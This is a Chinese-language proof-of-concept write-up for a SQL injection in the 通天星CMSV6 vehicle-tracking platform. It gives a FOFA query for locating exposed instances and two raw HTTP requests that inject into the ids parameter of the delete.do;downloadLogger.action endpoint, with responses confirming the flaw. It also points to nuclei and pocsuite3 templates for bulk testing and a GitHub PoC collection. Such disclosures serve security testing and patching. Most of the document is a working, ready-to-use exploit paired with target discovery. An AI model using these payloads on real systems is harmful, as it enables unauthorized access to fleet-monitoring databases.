免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

通天星CMSV6车载定位监控平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

fofa语句

body="/808gps/"

漏洞复现

打开页面

1712072323096.png

构造payload

1712072908091.png
1712073075285.png

payload_1 请求

GET /run_stop/delete.do;downloadLogger.action?ids=1)--+&loadAll=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

payload_1 响应

HTTP/1.1 200 
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85



{"result":0,"message":"OK","data":"","pagination":"","infos":"","key":"","resMap":""}

payload_2 请求

GET /run_stop/delete.do;downloadLogger.action?ids=1)&loadAll=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

payload_2 响应

HTTP/1.1 200 
Set-Cookie: JSESSIONID=1F53FD95C492A2A4B80879E048C53064; Path=/; HttpOnly
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET,OPTIONS
Access-Control-Max-Age: 3600
Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With,x-ui-request,lang,userId,token,csrftoken,Authorization,Access-Control-Allow-Headers
Access-Control-Allow-Credentials: true
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Disposition: inline;filename=f.txt
vary: accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 02 Apr 2024 15:48:00 GMT
Connection: close
Content-Length: 85

{"message":"服务器异常","result":10001}

nuclei批量验证(github获取)

1712072442256.png

pocsuite3 验证(github获取)

1712072650056.png

github poc总汇地址:https://github.com/AYcg/poc